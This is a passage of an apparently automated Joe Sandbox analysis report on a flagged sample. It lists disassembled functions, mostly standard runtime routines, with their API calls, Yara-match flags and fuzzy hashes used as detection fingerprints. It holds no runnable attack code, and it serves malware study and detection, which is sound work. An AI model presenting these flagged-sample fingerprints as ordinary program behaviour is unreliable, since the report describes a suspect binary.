                                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                                                                                                                                                                                          • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                                                                          • String ID: F(@
                                                                                                                                                                                                                                                                          • API String ID: 3213686812-2698495834
                                                                                                                                                                                                                                                                          • Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                                                                                                                                                                                                                          • Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E
                                                                                                                                                                                                                                                                          Function 0042DF7D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                                                                                                                                                                                          • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                                                                          • String ID: F(@
                                                                                                                                                                                                                                                                          • API String ID: 3213686812-2698495834
                                                                                                                                                                                                                                                                          • Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                                                                                                                                                                                                                          • Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E
                                                                                                                                                                                                                                                                          Function 004242C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
                                                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00424319
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                          • String ID: pScheduler
                                                                                                                                                                                                                                                                          • API String ID: 1381464787-923244539
                                                                                                                                                                                                                                                                          • Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                                                                                                                                                                                                                                          • Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D
                                                                                                                                                                                                                                                                          Function 0041E61D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
                                                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E660
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                          • String ID: pContext
                                                                                                                                                                                                                                                                          • API String ID: 1990795212-2046700901
                                                                                                                                                                                                                                                                          • Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                                                                                                                                                                                                                          • Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8
                                                                                                                                                                                                                                                                          Function 0042E03D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0042E069
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseFreeHandleLibrary_free
                                                                                                                                                                                                                                                                          • String ID: B
                                                                                                                                                                                                                                                                          • API String ID: 621396759-3071617958
                                                                                                                                                                                                                                                                          • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                                                                                                                                                                                                          • Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98
                                                                                                                                                                                                                                                                          Function 00415D8A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                          • String ID: pScheduler$version
                                                                                                                                                                                                                                                                          • API String ID: 1687795959-3154422776
                                                                                                                                                                                                                                                                          • Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                                                                                                                                                                                                                          • Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E
                                                                                                                                                                                                                                                                          Function 00435898 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                          • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                                                                                                                                                                                          • Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759
                                                                                                                                                                                                                                                                          Function 024C5AFF Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                          • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                                                                                                                                                                                          • Instruction ID: 359585f543fb61817e44aa8209f9bb017510ec38934e65a20ff6745d2fe46f3f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65A158799007869FD762CF1CC8907AEBBE1EF55310F6481AFD485AB381D334A941CB50
                                                                                                                                                                                                                                                                          Function 0043FA08 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                                                                                                          • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                                                                                                                                                                                          • Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D
                                                                                                                                                                                                                                                                          Function 024CFC6F Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                                                                                                          • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                                                                                                                                                                                          • Instruction ID: 7822b99a991e891080caa40178be8f32a52878d3b8da4d556e7df8e5e7ee9766
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8412B396005016BDBA56FBDCC44AEF3A6BEF41730F360A1FF41A96690DB7C44458AB1
                                                                                                                                                                                                                                                                          Function 024C6B04 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,024C047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 024C6B51
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 024C6BDA
                                                                                                                                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 024C6BEC
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 024C6BF5
                                                                                                                                                                                                                                                                            • Part of subcall function 024C390E: RtlAllocateHeap.NTDLL(00000000,0249DAD7,00000000), ref: 024C3940
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2652629310-0
                                                                                                                                                                                                                                                                          • Opcode ID: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                                                                                                                                                                                                                                          • Instruction ID: 9d6383ef1c9bff20e68e007ce20f42b9f6b1676b018dced11cf4e67b4ca5493e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E031F436A0021AABDF25CF69CC40DAF7BA9EF84714F16826EEC04D7250EB35D951CB90
                                                                                                                                                                                                                                                                          Function 0040D3EB Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 531285432-0
                                                                                                                                                                                                                                                                          • Opcode ID: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                                                                                                                                                                                                                                          • Instruction ID: bdb17b43c911747218acdb07252438506425be6b3c89ff1608d2b8794f0e438d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D213B75E002099FDF00EFE5DC829AEB7B8EF49714F10406AF901B7291DB78AD058BA5
                                                                                                                                                                                                                                                                          Function 0249D652 Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 531285432-0
                                                                                                                                                                                                                                                                          • Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                                                                                                                                                                                          • Instruction ID: 4b208051555370009853c9382d1ac5e2f7cdeb4b72fb4f6fa46d924a994ee6e6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70213E76E00619AFDF04EFA5DC819BEBBB9EF49714F10006AE505A7290D775AD01CFA0
                                                                                                                                                                                                                                                                          Function 004236EF Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,00000000), ref: 00423739
                                                                                                                                                                                                                                                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721
                                                                                                                                                                                                                                                                            • Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
                                                                                                                                                                                                                                                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2630251706-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                                                                                                                                                                                                                                          • Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98
                                                                                                                                                                                                                                                                          Function 00401F9A Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000005), ref: 00401FAF
                                                                                                                                                                                                                                                                          • UpdateWindow.USER32 ref: 00401FB7
                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401FCB
                                                                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Window$Show$MoveUpdate
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1339878773-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                                                                                                                                                                                          • Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C
                                                                                                                                                                                                                                                                          Function 004290C9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 004290E3
                                                                                                                                                                                                                                                                            • Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
                                                                                                                                                                                                                                                                            • Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A
                                                                                                                                                                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 004290F8
                                                                                                                                                                                                                                                                          • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
                                                                                                                                                                                                                                                                          • CallCatchBlock.LIBVCRUNTIME ref: 00429131
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 737400349-0
                                                                                                                                                                                                                                                                          • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                                          • Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8
                                                                                                                                                                                                                                                                          Function 024B9330 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 024B934A
                                                                                                                                                                                                                                                                            • Part of subcall function 024B9297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 024B92C6
                                                                                                                                                                                                                                                                            • Part of subcall function 024B9297: ___AdjustPointer.LIBCMT ref: 024B92E1
                                                                                                                                                                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 024B935F
                                                                                                                                                                                                                                                                          • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 024B9370
                                                                                                                                                                                                                                                                          • CallCatchBlock.LIBVCRUNTIME ref: 024B9398
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 737400349-0
                                                                                                                                                                                                                                                                          • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                                          • Instruction ID: 28681ba3d8e0ef8aa481e3ad18e185457c2db1351c87df434b1823a2a6d0915f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96011732500148BBCF125EA6CC40EEB3F6AEF48754F054419FE5896120D376E861AFB0
                                                                                                                                                                                                                                                                          Function 00434F2F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
